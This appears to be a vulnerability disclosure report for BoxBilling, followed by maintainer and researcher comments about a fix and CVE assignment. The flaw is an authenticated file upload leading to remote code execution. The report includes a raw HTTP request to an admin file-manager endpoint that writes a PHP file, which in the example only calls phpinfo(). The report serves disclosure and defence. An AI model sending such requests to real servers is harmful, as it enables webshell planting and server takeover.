BoxBilling <=4.22.1.5 - Authenticated Unrestricted File Upload - RCE in boxbilling/boxbilling
Reported on
Sep 18th 2022
Description
BoxBilling was vulnerable to Unrestricted File Upload. In order to exploit the vulnerability, an attacker must have a valid authenticated session as admin on the CMS. With at least 1 order of product an attacker can upload malicious file to hidden API endpoint that contain a webshell and get RCE.
Proof of Concept
POST /index.php?_url=/api/admin/Filemanager/save_file HTTP/1.1
Host: local.com:8089
Content-Length: 52
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=3nrf9i4mv28o5anva77ltq042d
Connection: close
order_id=1&path=ax.php&data=<%3fphp+phpinfo()%3b%3f>
Video POC :
https://drive.google.com/file/d/1m2glCeJ9QXc8epuY2QfvbWwjLTJ8_Hjx/view?usp=sharing
Impact
An attacker can compromise the server by uploading the malicious file, and the vulnerability can be chained with other vulnerability (XSS,CSRF).
Great work @zetc0de 👌 Could you kindly propose/submit a fix for this vulnerability? Any help is appreciated.
Great work @zetc0de 👌 Could you kindly propose/submit a fix for this vulnerability? Any help is appreciated.
Great work @zetc0de 👌 Could you kindly propose/submit a fix for this vulnerability? Any help is appreciated.
Great work @zetc0de 👌 Could you kindly propose/submit a fix for this vulnerability? Any help is appreciated.
Timothy, we’ve already dealt with this and removed the problematic module entirely in 2021. It was resolved when you didn’t care about the project.
https://github.com/boxbilling/boxbilling/pull/932
Have a nice day.
Sorry for my late of receive comment update, since the comments section not notifying with email. Sounds good for community work to make boxbilling more secure. The root cause of vulnerability was described, based on vulnerability description the team can mitigate the risk by reducing attack vector for successful exploit.
Have a good day!
@admin can disclose this report? Also can to assign cve for this vulnerability?
Yağızhan(evrifaessa) At your convenience please publish this report per request of zetc0de who commented 4 hours ago and is the researcher of this disclosure.
@admin can disclose this report? Also can to assign cve for this vulnerability?
Thanks and have a nice day.
This report has now been assigned a CVE and it should publish momentarily as requested :)